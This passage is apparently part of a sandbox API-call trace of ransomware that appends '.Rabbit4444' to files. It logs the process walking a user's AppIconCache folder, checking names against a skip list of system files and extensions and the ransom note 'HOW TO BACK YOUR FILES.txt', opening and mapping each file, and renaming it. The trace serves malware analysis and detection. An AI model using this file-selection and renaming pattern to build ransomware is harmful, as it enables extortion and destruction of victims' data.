lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="Rabbit4444.exe") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2=".") returned 1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="..") returned 1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="windows") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="bootmgr") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="pagefile.sys") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="boot") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="ids.txt") returned -1 [0067.925] lstrcmpiW (lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}", lpString2="NTUSER.DAT") returned -1 [0067.925] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{5567FA0F-AE06-4D14-B697-1F596323F48A}" | out: lpString1="{5567FA0F-AE06-4D14-B697-1F596323F48A}") returned="{5567FA0F-AE06-4D14-B697-1F596323F48A}" [0067.925] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5567FA0F-AE06-4D14-B697-1F596323F48A}", dwFileAttributes=0x0) returned 1 [0067.925] lstrlenW (lpString="{5567FA0F-AE06-4D14-B697-1F596323F48A}") returned 38 [0067.925] lstrlenW (lpString="Rabbit4444") returned 10 [0067.925] lstrcmpiW (lpString1="96323F48A}", lpString2="Rabbit4444") returned -1 [0067.925] lstrlenW (lpString=".dll") returned 4 [0067.925] lstrcmpiW (lpString1="48A}", lpString2=".dll") returned 1 [0067.925] lstrlenW (lpString=".lnk") returned 4 [0067.925] lstrcmpiW (lpString1="48A}", lpString2=".lnk") returned 1 [0067.925] lstrlenW (lpString=".ini") returned 4 [0067.925] lstrcmpiW (lpString1="48A}", lpString2=".ini") returned 1 [0067.925] lstrlenW (lpString=".sys") returned 4 [0067.925] lstrcmpiW (lpString1="48A}", lpString2=".sys") returned 1 [0067.926] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5567FA0F-AE06-4D14-B697-1F596323F48A}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5567fa0f-ae06-4d14-b697-1f596323f48a}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.926] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.926] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15923663856) returned 1 [0067.926] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0067.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0067.926] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.927] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.929] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15924078473) returned 1 [0067.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0067.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0067.930] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.930] CloseHandle (hObject=0x29c) returned 1 [0067.930] CloseHandle (hObject=0x280) returned 1 [0067.930] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5567FA0F-AE06-4D14-B697-1F596323F48A}.Rabbit4444") returned 156 [0067.931] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5567FA0F-AE06-4D14-B697-1F596323F48A}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5567fa0f-ae06-4d14-b697-1f596323f48a}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5567FA0F-AE06-4D14-B697-1F596323F48A}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5567fa0f-ae06-4d14-b697-1f596323f48a}.rabbit4444"), dwFlags=0x1) returned 1 [0067.931] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9920a3b2, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9920a3b2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", cAlternateFileName="{5637C~1")) returned 1 [0067.931] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.931] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.931] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="Rabbit4444.exe") returned -1 [0067.931] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2=".") returned 1 [0067.931] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="..") returned 1 [0067.931] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="windows") returned -1 [0067.932] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="bootmgr") returned -1 [0067.932] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="pagefile.sys") returned -1 [0067.932] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="boot") returned -1 [0067.932] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="ids.txt") returned -1 [0067.932] lstrcmpiW (lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", lpString2="NTUSER.DAT") returned -1 [0067.932] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}" | out: lpString1="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}") returned="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}" [0067.932] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}", dwFileAttributes=0x0) returned 1 [0067.933] lstrlenW (lpString="{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}") returned 38 [0067.933] lstrlenW (lpString="Rabbit4444") returned 10 [0067.933] lstrcmpiW (lpString1="90B7A1CB0}", lpString2="Rabbit4444") returned -1 [0067.933] lstrlenW (lpString=".dll") returned 4 [0067.933] lstrcmpiW (lpString1="CB0}", lpString2=".dll") returned 1 [0067.933] lstrlenW (lpString=".lnk") returned 4 [0067.933] lstrcmpiW (lpString1="CB0}", lpString2=".lnk") returned 1 [0067.933] lstrlenW (lpString=".ini") returned 4 [0067.933] lstrcmpiW (lpString1="CB0}", lpString2=".ini") returned 1 [0067.933] lstrlenW (lpString=".sys") returned 4 [0067.933] lstrcmpiW (lpString1="CB0}", lpString2=".sys") returned 1 [0067.933] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5637c49e-dea6-4d65-b115-d7690b7a1cb0}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.933] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.933] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15924401721) returned 1 [0067.933] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.933] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0067.933] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.934] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.936] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.936] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.936] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.936] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.936] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15924663093) returned 1 [0067.936] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.936] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0067.936] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.936] CloseHandle (hObject=0x29c) returned 1 [0067.936] CloseHandle (hObject=0x280) returned 1 [0067.936] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}.Rabbit4444") returned 156 [0067.936] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5637c49e-dea6-4d65-b115-d7690b7a1cb0}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5637C49E-DEA6-4D65-B115-D7690B7A1CB0}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5637c49e-dea6-4d65-b115-d7690b7a1cb0}.rabbit4444"), dwFlags=0x1) returned 1 [0067.937] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb511781d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb511781d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{56628538-F2B6-49FB-9D10-354E728724C4}", cAlternateFileName="{56628~1")) returned 1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="Rabbit4444.exe") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2=".") returned 1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="..") returned 1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="windows") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="bootmgr") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="pagefile.sys") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="boot") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="ids.txt") returned -1 [0067.937] lstrcmpiW (lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}", lpString2="NTUSER.DAT") returned -1 [0067.937] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{56628538-F2B6-49FB-9D10-354E728724C4}" | out: lpString1="{56628538-F2B6-49FB-9D10-354E728724C4}") returned="{56628538-F2B6-49FB-9D10-354E728724C4}" [0067.937] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{56628538-F2B6-49FB-9D10-354E728724C4}", dwFileAttributes=0x0) returned 1 [0067.939] lstrlenW (lpString="{56628538-F2B6-49FB-9D10-354E728724C4}") returned 38 [0067.939] lstrlenW (lpString="Rabbit4444") returned 10 [0067.939] lstrcmpiW (lpString1="E728724C4}", lpString2="Rabbit4444") returned -1 [0067.939] lstrlenW (lpString=".dll") returned 4 [0067.939] lstrcmpiW (lpString1="4C4}", lpString2=".dll") returned 1 [0067.939] lstrlenW (lpString=".lnk") returned 4 [0067.939] lstrcmpiW (lpString1="4C4}", lpString2=".lnk") returned 1 [0067.939] lstrlenW (lpString=".ini") returned 4 [0067.939] lstrcmpiW (lpString1="4C4}", lpString2=".ini") returned 1 [0067.939] lstrlenW (lpString=".sys") returned 4 [0067.939] lstrcmpiW (lpString1="4C4}", lpString2=".sys") returned 1 [0067.939] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{56628538-F2B6-49FB-9D10-354E728724C4}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{56628538-f2b6-49fb-9d10-354e728724c4}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.939] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.939] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15925025643) returned 1 [0067.940] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0067.940] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0067.940] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.941] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.942] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.942] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15925290458) returned 1 [0067.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0067.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0067.942] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.942] CloseHandle (hObject=0x29c) returned 1 [0067.942] CloseHandle (hObject=0x280) returned 1 [0067.943] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{56628538-F2B6-49FB-9D10-354E728724C4}.Rabbit4444") returned 156 [0067.943] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{56628538-F2B6-49FB-9D10-354E728724C4}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{56628538-f2b6-49fb-9d10-354e728724c4}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{56628538-F2B6-49FB-9D10-354E728724C4}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{56628538-f2b6-49fb-9d10-354e728724c4}.rabbit4444"), dwFlags=0x1) returned 1 [0067.943] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb511781d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb511781d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{58BFC882-C01D-4396-BF26-A55720BADA37}", cAlternateFileName="{58BFC~1")) returned 1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="Rabbit4444.exe") returned -1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2=".") returned 1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="..") returned 1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="windows") returned -1 [0067.943] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="bootmgr") returned -1 [0067.944] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="pagefile.sys") returned -1 [0067.944] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="boot") returned -1 [0067.944] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="ids.txt") returned -1 [0067.944] lstrcmpiW (lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}", lpString2="NTUSER.DAT") returned -1 [0067.944] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{58BFC882-C01D-4396-BF26-A55720BADA37}" | out: lpString1="{58BFC882-C01D-4396-BF26-A55720BADA37}") returned="{58BFC882-C01D-4396-BF26-A55720BADA37}" [0067.944] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{58BFC882-C01D-4396-BF26-A55720BADA37}", dwFileAttributes=0x0) returned 1 [0067.945] lstrlenW (lpString="{58BFC882-C01D-4396-BF26-A55720BADA37}") returned 38 [0067.945] lstrlenW (lpString="Rabbit4444") returned 10 [0067.945] lstrcmpiW (lpString1="720BADA37}", lpString2="Rabbit4444") returned -1 [0067.945] lstrlenW (lpString=".dll") returned 4 [0067.945] lstrcmpiW (lpString1="A37}", lpString2=".dll") returned 1 [0067.945] lstrlenW (lpString=".lnk") returned 4 [0067.945] lstrcmpiW (lpString1="A37}", lpString2=".lnk") returned 1 [0067.945] lstrlenW (lpString=".ini") returned 4 [0067.945] lstrcmpiW (lpString1="A37}", lpString2=".ini") returned 1 [0067.945] lstrlenW (lpString=".sys") returned 4 [0067.945] lstrcmpiW (lpString1="A37}", lpString2=".sys") returned 1 [0067.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{58BFC882-C01D-4396-BF26-A55720BADA37}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{58bfc882-c01d-4396-bf26-a55720bada37}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.946] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.946] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15925650085) returned 1 [0067.946] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0067.946] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.947] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15926102135) returned 1 [0067.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.950] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0067.950] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.951] CloseHandle (hObject=0x29c) returned 1 [0067.951] CloseHandle (hObject=0x280) returned 1 [0067.951] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{58BFC882-C01D-4396-BF26-A55720BADA37}.Rabbit4444") returned 156 [0067.951] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{58BFC882-C01D-4396-BF26-A55720BADA37}" (normalized: 